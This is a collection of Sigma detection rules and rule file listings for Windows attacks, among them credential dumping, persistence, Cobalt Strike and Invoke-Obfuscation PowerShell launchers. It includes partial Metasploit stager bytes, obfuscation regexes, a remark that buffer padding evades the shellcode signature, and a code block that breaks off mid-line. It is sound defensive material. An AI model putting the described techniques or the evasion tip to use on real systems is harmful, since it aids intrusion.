dns_query_win_gotoopener.yml
dns_query_win_hybridconnectionmgr_servicebus.yml
dns_query_win_lobas_appinstaller.yml
dns_query_win_logmein.yml
dns_query_win_mal_cobaltstrike.yml
dns_query_win_mega_nz.yml
dns_query_win_possible_dns_rebinding.yml
dns_query_win_regsvr32_network_activity.yml
dns_query_win_susp_ipify.yml
dns_query_win_susp_teamviewer.yml
dns_query_win_tor_onion.yml

driver_load

driver_load_mal_creddumper.yml
driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml
driver_load_powershell_script_installed_as_service.yml
driver_load_susp_temp_use.yml
driver_load_vuln_dell_driver.yml
driver_load_windivert.yml

etw/file_rename

file_rename_win_not_dll_to_dll.yml

file_delete

file_delete_win_cve_2021_1675_printspooler_del.yml
file_delete_win_delete_appli_log.yml
file_delete_win_delete_backup_file.yml
file_delete_win_delete_prefetch.yml
file_delete_win_sysinternals_sdelete_file_deletion.yml

file_event

file_event_win_access_susp_unattend_xml.yml
file_event_win_advanced_ip_scanner.yml
file_event_win_anydesk_artefact.yml
file_event_win_apt_unidentified_nov_18.yml
file_event_win_creation_new_shim_database.yml
file_event_win_creation_scr_binary_file.yml
file_event_win_creation_system_file.yml
file_event_win_creation_unquoted_service_path.yml
file_event_win_cred_dump_tools_dropped_files.yml
file_event_win_csharp_compile_artefact.yml
file_event_win_cve_2021_1675_printspooler.yml
file_event_win_cve_2021_26858_msexchange.yml
file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml
file_event_win_cve_2021_41379_msi_lpe.yml
file_event_win_detect_powerup_dllhijacking.yml
file_event_win_ghostpack_safetykatz.yml
file_event_win_gotoopener_artefact.yml
file_event_win_hack_dumpert.yml
file_event_win_hivenightmare_file_exports.yml
file_event_win_hktl_createminidump.yml
file_event_win_hktl_nppspy.yml
file_event_win_install_teamviewer_desktop.yml
file_event_win_iso_file_recent.yml
file_event_win_lsass_dump.yml
file_event_win_lsass_memory_dump_file_creation.yml
file_event_win_mal_adwind.yml
file_event_win_mal_octopus_scanner.yml
file_event_win_mal_vhd_download.yml
file_event_win_mimikatz_kirbi_file_creation.yml
file_event_win_mimikatz_memssp_log_file.yml
file_event_win_office_persistence.yml
file_event_win_outlook_c2_macro_creation.yml
file_event_win_outlook_newform.yml
file_event_win_pcre_net_temp_file.yml
file_event_win_pingback_backdoor.yml
file_event_win_powershell_exploit_scripts.yml
file_event_win_powershell_startup_shortcuts.yml
file_event_win_quarkspw_filedump.yml
file_event_win_rclone_exec_file.yml
file_event_win_redmimicry_winnti_filedrop.yml
file_event_win_sam_dump.yml
file_event_win_screenconnect_artefact.yml
file_event_win_script_creation_by_office_using_file_ext.yml
file_event_win_susp_adsi_cache_usage.yml
file_event_win_susp_clr_logs.yml
file_event_win_susp_colorcpl.yml
file_event_win_susp_desktop_ini.yml
file_event_win_susp_desktop_txt.yml
file_event_win_susp_desktopimgdownldr_file.yml
file_event_win_susp_exchange_aspx_write.yml
file_event_win_susp_ntds_dit.yml
file_event_win_susp_pfx_file_creation.yml
file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml
file_event_win_susp_system_interactive_powershell.yml
file_event_win_susp_task_write.yml
file_event_win_susp_teamviewer_remote_session.yml
file_event_win_suspicious_powershell_profile_create.yml
file_event_win_tool_psexec.yml
file_event_win_tsclient_filewrite_startup.yml
file_event_win_uac_bypass_consent_comctl32.yml
file_event_win_uac_bypass_dotnet_profiler.yml
file_event_win_uac_bypass_ieinstal.yml
file_event_win_uac_bypass_msconfig_gui.yml
file_event_win_uac_bypass_ntfs_reparse_point.yml
file_event_win_uac_bypass_winsat.yml
file_event_win_uac_bypass_wmp.yml
file_event_win_webshell_creation_detect.yml
file_event_win_win_cscript_wscript_dropper.yml
file_event_win_win_shell_write_susp_directory.yml
file_event_win_winrm_awl_bypass.yml
file_event_win_winword_cve_2021_40444.yml
file_event_win_wmi_persistence_script_event_consumer_write.yml
file_event_win_wmiprvse_wbemcomn_dll_hijack.yml
file_event_win_writing_local_admin_share.yml

Startup Folder File Write

title: Startup Folder File Write
id: 2aa0a6b4-a865-495b-ab51-c28249537b75
status: test
description: A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
references:
    - https://github.com/OTRF/detection-hackathon-apt29/issues/12
    - https://threathunterplaybook.com/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.html
date: 2020/05/02
modified: 2021/11/27
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|contains: 'ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'
    condition: selection
falsepositives:
    - unknown
level: low
tags:
    - attack.persistence
    - attack.t1547.001

PowerShell Writing Startup Shortcuts

title: PowerShell Writing Startup Shortcuts
id: 92fa78e7-4d39-45f1-91a3-8b23f3f1088d
description: Attempts to detect PowerShell writing startup shortcuts. This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL"
status: experimental
references:
    - https://redcanary.com/blog/intelligence-insights-october-2021/
    - https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder
tags:
    - attack.registry_run_keys_/_startup_folder
    - attack.t1547.001
date: 2021/10/24
author: Christopher Peacock '@securepeacock', SCYTHE
level: high
logsource:
    product: windows
    category: file_event
detection:
    selection:
        Image|endswith: '\powershell.exe'
        TargetFilename|contains: '\start menu\programs\startup\'
        TargetFilename|endswith: '.lnk'
    condition: selection
falsepositives:
    - Unknown
    - Depending on your environment, accepted applications may leverage this at times. It is recommended to search for anomalies indicative of malware.

Moriya Rootkit

title: Moriya Rootkit
id: a1507d71-0b60-44f6-b17c-bf53220fdd88
related:
    - id: 25b9c01c-350d-4b95-bed1-836d04a4f324
      type: derived
description: Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report
status: experimental
author: Bhabesh Raj
date: 2021/05/06
modified: 2021/09/21
references:
    - https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831
tags:
    - attack.persistence
    - attack.privilege_escalation
    - attack.t1543.003
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename: 'C:\Windows\System32\drivers\MoriyaStreamWatchmen.sys'
    condition: selection
level: critical
falsepositives:
    - None

Dump Office Macro Files from Commandline

title: Dump Office Macro Files from Commandline
id: b1c50487-1967-4315-a026-6491686d860e
status: experimental
description: An Office file with macros is created from a command line or a script
author: frack113
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md
    - https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference
date: 2022/01/23
logsource:
    category: file_event
    product: windows
detection:
    selection_ext:
        TargetFilename|endswith:
            - .docm
            - .dotm
            - .xlsm
            - .xltm
            - .potm
            - .pptm
            - .pptx
    selection_cmd:
        - Image|endswith:
            - \cmd.exe
            - \powershell.exe
        - ParentImage|endswith:
            - \cmd.exe
            - \powershell.exe
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
tags:
    - attack.initial_access
    - attack.t1566.001

image_load

image_load_abusing_azure_browser_sso.yml
image_load_alternate_powershell_hosts_moduleload.yml
image_load_foggyweb_nobelium.yml
image_load_in_memory_powershell.yml
image_load_mimikatz_inmemory_detection.yml
image_load_pcre_net_load.yml
image_load_pingback_backdoor.yml
image_load_scrcons_imageload_wmi_scripteventconsumer.yml
image_load_silenttrinity_stage_use.yml
image_load_spoolsv_dll_load.yml
image_load_susp_advapi32_dll.yml
image_load_susp_fax_dll.yml
image_load_susp_image_load.yml
image_load_susp_office_dotnet_assembly_dll_load.yml
image_load_susp_office_dotnet_clr_dll_load.yml
image_load_susp_office_dotnet_gac_dll_load.yml
image_load_susp_office_dsparse_dll_load.yml
image_load_susp_office_kerberos_dll_load.yml
image_load_susp_python_image_load.yml
image_load_susp_script_dotnet_clr_dll_load.yml
image_load_susp_system_drawing_load.yml
image_load_susp_winword_vbadll_load.yml
image_load_susp_winword_wmidll_load.yml
image_load_suspicious_dbghelp_dbgcore_load.yml
image_load_suspicious_vss_ps_load.yml
image_load_svchost_dll_search_order_hijack.yml
image_load_tttracer_mod_load.yml
image_load_uac_bypass_via_dism.yml
image_load_uipromptforcreds_dlls.yml
image_load_unsigned_image_loaded_into_lsass.yml
image_load_usp_svchost_clfsw32.yml
image_load_wmi_module_load.yml
image_load_wmi_persistence_commandline_event_consumer.yml
image_load_wmic_remote_xsl_scripting_dlls.yml
image_load_wmiprvse_wbemcomn_dll_hijack.yml
image_load_wsman_provider_image_load.yml

network_connection

net_connection_win_binary_github_com.yml
net_connection_win_binary_susp_com.yml
net_connection_win_crypto_mining.yml
net_connection_win_dllhost_net_connections.yml
net_connection_win_excel_outbound_network_connection.yml
net_connection_win_imewdbld.yml
net_connection_win_malware_backconnect_ports.yml
net_connection_win_mega_nz.yml
net_connection_win_msiexec.yml
net_connection_win_notepad_network_connection.yml
net_connection_win_powershell_network_connection.yml
net_connection_win_python.yml
net_connection_win_rdp_reverse_tunnel.yml
net_connection_win_regsvr32_network_activity.yml
net_connection_win_remote_powershell_session_network.yml
net_connection_win_rundll32_net_connections.yml
net_connection_win_silenttrinity_stager_msbuild_activity.yml
net_connection_win_susp_outbound_smtp_connections.yml
net_connection_win_susp_prog_location_network_connection.yml
net_connection_win_susp_rdp.yml
net_connection_win_suspicious_outbound_kerberos_connection.yml
net_connection_win_wuauclt_network_connection.yml

pipe_created

pipe_created_alternate_powershell_hosts_pipe.yml
pipe_created_apt_turla_namedpipes.yml
pipe_created_cred_dump_tools_named_pipes.yml
pipe_created_efspotato_namedpipe.yml
pipe_created_mal_cobaltstrike.yml
pipe_created_mal_cobaltstrike_re.yml
pipe_created_mal_namedpipes.yml
pipe_created_powershell_execution_pipe.yml
pipe_created_psexec_pipes_artifacts.yml
pipe_created_susp_adfs_namedpipe_connection.yml
pipe_created_susp_cobaltstrike_pipe_patterns.yml
pipe_created_susp_wmi_consumer_namedpipe.yml
pipe_created_tool_psexec.yml

powershell

powershell_classic

posh_pc_alternate_powershell_hosts.yml
posh_pc_delete_volume_shadow_copies.yml
posh_pc_downgrade_attack.yml
posh_pc_exe_calling_ps.yml
posh_pc_powercat.yml
posh_pc_remote_powershell_session.yml
posh_pc_renamed_powershell.yml
posh_pc_susp_athremotefxvgpudisablementcommand.yml
posh_pc_susp_get_nettcpconnection.yml
posh_pc_susp_zip_compress.yml
posh_pc_suspicious_download.yml
posh_pc_tamper_with_windows_defender.yml
posh_pc_wsman_com_provider_no_powershell.yml
posh_pc_xor_commandline.yml

powershell_module

posh_pm_alternate_powershell_hosts.yml
posh_pm_bad_opsec_artifacts.yml
posh_pm_clear_powershell_history.yml
posh_pm_decompress_commands.yml
posh_pm_get_clipboard.yml
posh_pm_invoke_obfuscation_clip.yml
posh_pm_invoke_obfuscation_obfuscated_iex.yml
posh_pm_invoke_obfuscation_stdin.yml
posh_pm_invoke_obfuscation_var.yml
posh_pm_invoke_obfuscation_via_compress.yml
posh_pm_invoke_obfuscation_via_rundll.yml
posh_pm_invoke_obfuscation_via_stdin.yml
posh_pm_invoke_obfuscation_via_use_clip.yml
posh_pm_invoke_obfuscation_via_use_mhsta.yml
posh_pm_invoke_obfuscation_via_use_rundll32.yml
posh_pm_invoke_obfuscation_via_var.yml
posh_pm_powercat.yml
posh_pm_remote_powershell_session.yml
posh_pm_susp_athremotefxvgpudisablementcommand.yml
posh_pm_susp_get_nettcpconnection.yml
posh_pm_susp_zip_compress.yml
posh_pm_suspicious_ad_group_reco.yml
posh_pm_suspicious_download.yml
posh_pm_suspicious_invocation_generic.yml
posh_pm_suspicious_invocation_specific.yml
posh_pm_suspicious_local_group_reco.yml
posh_pm_suspicious_reset_computermachinepassword.yml
posh_pm_suspicious_smb_share_reco.yml
posh_pm_syncappvpublishingserver_exe.yml

powershell_script

posh_ps_access_to_browser_login_data.yml
posh_ps_access_to_chrome_login_data.yml
posh_ps_accessing_win_api.yml
posh_ps_adrecon_execution.yml
posh_ps_automated_collection.yml
posh_ps_azurehound_commands.yml
posh_ps_capture_screenshots.yml
posh_ps_cl_invocation_lolscript.yml
posh_ps_cl_invocation_lolscript_count.yml
posh_ps_cl_mutexverifiers_lolscript.yml
posh_ps_cl_mutexverifiers_lolscript_count.yml
posh_ps_clear_powershell_history.yml
posh_ps_clearing_windows_console_history.yml
posh_ps_cmdlet_scheduled_task.yml
posh_ps_copy_item_system32.yml
posh_ps_cor_profiler.yml
posh_ps_create_local_user.yml
posh_ps_create_volume_shadow_copy.yml
posh_ps_data_compressed.yml
posh_ps_detect_vm_env.yml
posh_ps_directorysearcher.yml
posh_ps_directoryservices_accountmanagement.yml
posh_ps_dnscat_execution.yml
posh_ps_dump_password_windows_credential_manager.yml
posh_ps_enable_psremoting.yml
posh_ps_enumerate_password_windows_credential_manager.yml
posh_ps_file_and_directory_discovery.yml
posh_ps_get_acl_service.yml
posh_ps_get_adreplaccount.yml
posh_ps_get_childitem_bookmarks.yml
posh_ps_icmp_exfiltration.yml
posh_ps_invoke_command_remote.yml
posh_ps_invoke_dnsexfiltration.yml
posh_ps_invoke_nightmare.yml
posh_ps_keylogging.yml
posh_ps_localuser.yml
posh_ps_malicious_commandlets.yml
posh_ps_malicious_keywords.yml
posh_ps_memorydump_getstoragediagnosticinfo.yml
posh_ps_msxml_com.yml
posh_ps_nishang_malicious_commandlets.yml
posh_ps_ntfs_ads_access.yml
posh_ps_office_comobject_registerxll.yml
posh_ps_powerview_malicious_commandlets.yml
posh_ps_prompt_credentials.yml
posh_ps_psattack.yml
posh_ps_remote_session_creation.yml
posh_ps_remove_item_path.yml
posh_ps_request_kerberos_ticket.yml
posh_ps_root_certificate_installed.yml
posh_ps_run_from_mount_diskimage.yml
posh_ps_security_software_discovery.yml
posh_ps_send_mailmessage.yml
posh_ps_set_policies_to_unsecure_level.yml
posh_ps_shellintel_malicious_commandlets.yml
posh_ps_software_discovery.yml
posh_ps_store_file_in_alternate_data_stream.yml
posh_ps_susp_invoke_webrequest_useragent.yml
posh_ps_susp_remove_adgroupmember.yml
posh_ps_susp_ssl_keyword.yml
posh_ps_susp_wallpaper.yml
posh_ps_susp_win32_shadowcopy.yml
posh_ps_susp_zip_compress.yml
posh_ps_suspicious_ad_group_reco.yml
posh_ps_suspicious_download.yml
posh_ps_suspicious_execute_batch_script.yml
posh_ps_suspicious_export_pfxcertificate.yml
posh_ps_suspicious_extracting.yml
posh_ps_suspicious_getprocess_lsass.yml
posh_ps_suspicious_gwmi.yml
posh_ps_suspicious_invocation_generic.yml
posh_ps_suspicious_invocation_specific.yml
posh_ps_suspicious_iofilestream.yml
posh_ps_suspicious_keywords.yml
posh_ps_suspicious_local_group_reco.yml
posh_ps_suspicious_mail_acces.yml
posh_ps_suspicious_mount_diskimage.yml
posh_ps_suspicious_mounted_share_deletion.yml
posh_ps_suspicious_networkcredential.yml
posh_ps_suspicious_new_psdrive.yml
posh_ps_suspicious_recon.yml
posh_ps_suspicious_smb_share_reco.yml
posh_ps_suspicious_start_process.yml
posh_ps_suspicious_unblock_file.yml
posh_ps_suspicious_win32_pnpentity.yml
posh_ps_suspicious_windowstyle.yml
posh_ps_syncappvpublishingserver_exe.yml
posh_ps_tamper_defender.yml
posh_ps_test_netconnection.yml
posh_ps_timestomp.yml
posh_ps_trigger_profiles.yml
posh_ps_upload.yml
posh_ps_web_request.yml
posh_ps_windows_firewall_profile_disabled.yml
posh_ps_winlogon_helper_dll.yml
posh_ps_wmi_persistence.yml
posh_ps_wmimplant.yml
posh_ps_xml_iex.yml

PowerShell ShellCode Base64ed
  • AAAAYInlM
  • OiCAAAAYInlM
  • OiJAAAAYInlM

What is the original data behind these strings?

title: PowerShell ShellCode
id: 16b37b70-6fcf-4814-a092-c36bd3aafcbd
status: experimental
description: Detects Base64 encoded Shellcode
references:
    - https://twitter.com/cyb3rops/status/1063072865992523776
tags:
    - attack.defense_evasion
    - attack.privilege_escalation
    - attack.t1055
    - attack.execution
    - attack.t1059.001
author: David Ledbetter (shellcode), Florian Roth (rule)
date: 2018/11/17
modified: 2021/10/16
logsource:
    product: windows
    category: ps_script
    definition: Script block logging must be enabled
detection:
    selection:
        ScriptBlockText|contains: 'AAAAYInlM'
    selection2:
        ScriptBlockText|contains:
            - 'OiCAAAAYInlM'
            - 'OiJAAAAYInlM'
    condition: selection and selection2
falsepositives:
    - Unknown
level: critical
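The note above asks what raw data sits behind the three Base64 fragments. The following Python is an added example written for this page, not part of the Sigma rule or its references. It assumes the fragments come from the leading bytes of the Metasploit x86 block_api stager prologue (the sample bytes are constructed from that well-known prologue; the 0x8f variant is hypothetical and only there to show what the condition excludes). It maps each fragment back to the bytes it covers and shows that the substrings only catch the stub when the shellcode begins at a 3-byte-aligned position of the encoded buffer, which is where PowerShell shellcode loaders normally put it.

```python
import base64

# Constructed sample input (not from the rule): the leading bytes of the widely reused
# Metasploit x86 "block_api" stager prologue: cld / call <api-hash resolver> / pushad /
# mov ebp,esp. Older builds use call displacement 0x82, newer ones 0x89, which is why
# the rule carries the two 12-character variants OiC... and OiJ....
STAGER_OLD = bytes.fromhex("fc e8 82 00 00 00 60 89 e5 31 c0 64 8b 50 30")
STAGER_NEW = bytes.fromhex("fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30")
# Hypothetical variant with a displacement the rule does not list (0x8f); it exists
# only to show what 'selection and selection2' leaves out.
STAGER_OTHER = bytes.fromhex("fc e8 8f 00 00 00 60 89 e5 31 c0 64 8b 50 30")

SELECTION = ("AAAAYInlM",)
SELECTION2 = ("OiCAAAAYInlM", "OiJAAAAYInlM")


def rule_matches(script_block_text: str) -> bool:
    """The rule's condition 'selection and selection2' with Sigma's |contains
    semantics, i.e. plain case-sensitive substring tests."""
    hit1 = any(s in script_block_text for s in SELECTION)
    hit2 = any(s in script_block_text for s in SELECTION2)
    return hit1 and hit2


def encode_at_offset(shellcode: bytes, offset: int) -> str:
    """Base64 text of the shellcode when `offset` filler bytes precede it. Base64 maps
    3-byte groups to 4 characters, so the same bytes produce different text at each
    of the three possible alignments."""
    return base64.b64encode(b"\x90" * offset + shellcode).decode("ascii")


def alignment_hits(shellcode: bytes) -> dict:
    """Which of the three alignments the rule detects for this shellcode."""
    return {n: rule_matches(encode_at_offset(shellcode, n)) for n in range(3)}


def covered_bytes(shellcode: bytes, fragment: str) -> dict:
    """Answer 'what are the raw bytes behind this fragment': locate the fragment in
    the aligned encoding and map its character span back to the bytes it fully
    covers. The first and last characters may hold only part of a byte; those bytes
    are reported separately rather than guessed."""
    text = encode_at_offset(shellcode, 0)
    pos = text.find(fragment)
    if pos < 0:
        return {"found": False}
    first_bit, last_bit = pos * 6, (pos + len(fragment)) * 6  # half-open bit span
    first_full = (first_bit + 7) // 8                           # round up to a byte
    last_full = last_bit // 8                                   # round down
    return {
        "found": True,
        "char_offset": pos,
        "full": shellcode[first_full:last_full].hex(),
        "partial_before": shellcode[first_bit // 8:first_full].hex(),
        "partial_after": shellcode[last_full:(last_bit + 7) // 8].hex(),
    }


def selection2_implies_selection() -> bool:
    """Every selection2 string contains the selection string, so the 'and' in the
    condition only narrows the match to the two listed call displacements."""
    return all(any(s in long for s in SELECTION) for long in SELECTION2)


if __name__ == "__main__":
    for name, sc in (("old", STAGER_OLD), ("new", STAGER_NEW), ("other", STAGER_OTHER)):
        print(name, encode_at_offset(sc, 0), alignment_hits(sc))
    for frag in SELECTION + SELECTION2:
        print(frag, covered_bytes(STAGER_NEW if "OiJ" in frag else STAGER_OLD, frag))
    print("selection2 implies selection:", selection2_implies_selection())
```

Two things worth knowing when tuning this rule: `AAAAYInlM` on its own covers `00 00 00 60 89 E5` and therefore any call displacement, while the two longer strings pin the match to 0x82 and 0x89, so the `and` in the condition is what makes the rule narrow; and a loader that prepends one or two bytes before encoding shifts the alignment and none of the three strings appear, so a loader that deliberately pads its buffer evades this signature.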

Obfuscation

Invoke-Obfuscation CLIP+ Launcher
title: Invoke-Obfuscation CLIP+ Launcher
id: 73e67340-0d25-11eb-adc1-0242ac120002
description: Detects Obfuscated use of Clip.exe to execute PowerShell
status: experimental
author: Jonathan Cheong, oscd.community
date: 2020/10/13
modified: 2021/10/16
references:
    - https://github.com/Neo23x0/sigma/issues/1009 #(Task 26)
tags:
    - attack.defense_evasion
    - attack.t1027
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: Script block logging must be enabled
detection:
    selection_4104:
        ScriptBlockText|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"'
    condition: selection_4104
falsepositives:
    - Unknown
level: high

Invoke-Obfuscation Obfuscated IEX Invocation
title: Invoke-Obfuscation Obfuscated IEX Invocation
id: 1b9dc62e-6e9e-42a3-8990-94d7a10007f7
description: Detects all variations of obfuscated PowerShell IEX invocation code generated by the Invoke-Obfuscation framework from the code block linked in the references
references:
    - https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888
status: experimental
author: 'Daniel Bohannon (@Mandiant/@FireEye), oscd.community'
date: 2019/11/08
modified: 2022/01/27
tags:
    - attack.defense_evasion
    - attack.t1027
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: Script block logging must be enabled
detection:
    selection_iex:
        - ScriptBlockText|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\['
        - ScriptBlockText|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\['
        - ScriptBlockText|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\['
        - ScriptBlockText|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}'
        - ScriptBlockText|re: '\\\\*mdr\\\\*\W\s*\)\.Name'
        - ScriptBlockText|re: '\$VerbosePreference\.ToString\('
    condition: selection_iex
falsepositives:
    - Unknown
level: high

Invoke-Obfuscation STDIN+ Launcher
title: Invoke-Obfuscation STDIN+ Launcher
id: 779c8c12-0eb1-11eb-adc1-0242ac120002
description: Detects Obfuscated use of stdin to execute PowerShell
status: experimental
author: Jonathan Cheong, oscd.community
date: 2020/10/15
modified: 2021/10/16
references:
    - https://github.com/Neo23x0/sigma/issues/1009 #(Task 25)
tags:
    - attack.defense_evasion
    - attack.t1027
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: Script block logging must be enabled
detection:
    selection_4104:
        ScriptBlockText|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"'
    condition: selection_4104
falsepositives:
    - Unknown
level: high

Invoke-Obfuscation VAR+ Launcher
title: Invoke-Obfuscation VAR+ Launcher
id: 0adfbc14-0ed1-11eb-adc1-0242ac120002
description: Detects Obfuscated use of Environment Variables to execute PowerShell
status: experimental
author: Jonathan Cheong, oscd.community
date: 2020/10/15
modified: 2021/10/16
references:
    - https://github.com/Neo23x0/sigma/issues/1009 #(Task 24)
tags:
    - attack.defense_evasion
    - attack.t1027
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: Script block logging must be enabled
detection:
    selection_4104:
        ScriptBlockText|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"'
    condition: selection_4104
falsepositives:
    - Unknown
level: high

Invoke-Obfuscation COMPRESS OBFUSCATION
title: Invoke-Obfuscation COMPRESS OBFUSCATION
id: 20e5497e-331c-4cd5-8d36-935f6e2a9a07
description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
status: experimental
author: Timur Zinniatullin, oscd.community
date: 2020/10/18
modified: 2021/10/16
references:
    - https://github.com/Neo23x0/sigma/issues/1009 #(Task 19)
tags:
    - attack.defense_evasion
    - attack.t1027
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: Script block logging must be enabled
detection:
    selection_4104:
        ScriptBlockText|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend'
    condition: selection_4104
falsepositives:
    - Unknown
level: medium

Invoke-Obfuscation RUNDLL LAUNCHER
title: Invoke-Obfuscation RUNDLL LAUNCHER
id: e6cb92b4-b470-4eb8-8a9d-d63e8583aae0
description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
status: experimental
author: Timur Zinniatullin, oscd.community
date: 2020/10/18
modified: 2021/10/16
references:
    - https://github.com/Neo23x0/sigma/issues/1009 #(Task 23)
tags:
    - attack.defense_evasion
    - attack.t1027
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: Script block logging must be enabled
detection:
    selection_4104:
        ScriptBlockText|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"'
    condition: selection_4104
falsepositives:
    - Unknown
level: medium

Invoke-Obfuscation Via Stdin
title: Invoke-Obfuscation Via Stdin
id: 86b896ba-ffa1-4fea-83e3-ee28a4c915c7
description: Detects Obfuscated Powershell via Stdin in Scripts
status: experimental
author: Nikita Nazarov, oscd.community
date: 2020/10/12
modified: 2021/10/16
references:
    - https://github.com/Neo23x0/sigma/issues/1009 #(Task28)
tags:
    - attack.defense_evasion
    - attack.t1027
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: Script block logging must be enabled
detection:
    selection_4104:
        ScriptBlockText|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"'
    condition: selection_4104
falsepositives:
    - Unknown
level: high

Invoke-Obfuscation Via Use Clip
title: Invoke-Obfuscation Via Use Clip
id: db92dd33-a3ad-49cf-8c2c-608c3e30ace0
description: Detects Obfuscated Powershell via use Clip.exe in Scripts
status: experimental
author: Nikita Nazarov, oscd.community
date: 2020/10/09
modified: 2021/10/16
references:
    - https://github.com/Neo23x0/sigma/issues/1009 #(Task29)
tags:
    - attack.defense_evasion
    - attack.t1027
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: Script block logging must be enabled
detection:
    selection_4104:
        ScriptBlockText|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*'
    condition: selection_4104
falsepositives:
    - Unknown
level: high

Invoke-Obfuscation Via Use MSHTA
title: Invoke-Obfuscation Via Use MSHTA
id: e55a5195-4724-480e-a77e-3ebe64bd3759
description: Detects Obfuscated Powershell via use MSHTA in Scripts
status: experimental
author: Nikita Nazarov, oscd.community
date: 2020/10/08
modified: 2021/10/16
references:
    - https://github.com/Neo23x0/sigma/issues/1009 #(Task31)
tags:
    - attack.defense_evasion
    - attack.t1027
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: Script block logging must be enabled
detection:
    selection_4104:
        ScriptBlockText|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"'
    condition: selection_4104
falsepositives:
    - Unknown
level: high

Invoke-Obfuscation Via Use Rundll32
title: Invoke-Obfuscation Via Use Rundll32
id: a5a30a6e-75ca-4233-8b8c-42e0f2037d3b
description: Detects Obfuscated Powershell via use Rundll32 in Scripts
status: experimental
author: Nikita Nazarov, oscd.community
date: 2019/10/08
modified: 2021/10/16
references:
    - https://github.com/Neo23x0/sigma/issues/1009
tags:
    - attack.defense_evasion
    - attack.t1027
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: Script block logging must be enabled
detection:
    selection_4104:
        ScriptBlockText|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"'
    condition: selection_4104
falsepositives:
    - Unknown
level: high

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
id: e54f5149-6ba3-49cf-b153-070d24679126
description: Detects Obfuscated Powershell via VAR++ LAUNCHER
status: experimental
author: Timur Zinniatullin, oscd.community
date: 2020/10/13
modified: 2021/10/16
references:
    - https://github.com/Neo23x0/sigma/issues/1009 #(Task27)
tags:
    - attack.defense_evasion
    - attack.t1027
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: Script block logging must be enabled
detection:
    selection_4104:
        ScriptBlockText|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r
    condition: selection_4104
falsepositives:
    - Unknown
level: high
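To see how the ScriptBlockText|re patterns of the Obfuscated IEX Invocation, COMPRESS OBFUSCATION, RUNDLL LAUNCHER and Via Use Rundll32 rules above behave on Event ID 4104 data, here is an added Python evaluator written for this page; it is example code, not from SigmaHQ or from Invoke-Obfuscation. The regexes are copied verbatim from the rules; the script block samples are constructed (the `example.invalid` host is a reserved test name and the Base64 payload is a placeholder). It evaluates each rule the way Sigma does, a selection with several listed patterns firing when any one of them matches, and adds an `ignore_case` switch so the effect of the missing `(?i)` on the IEX patterns can be measured.

```python
import re

# Regular expressions copied verbatim from the Invoke-Obfuscation rules above
# (ScriptBlockText|re). A rule fires when any one of its listed patterns matches,
# which is how Sigma treats a list of values under one selection.
RULES = {
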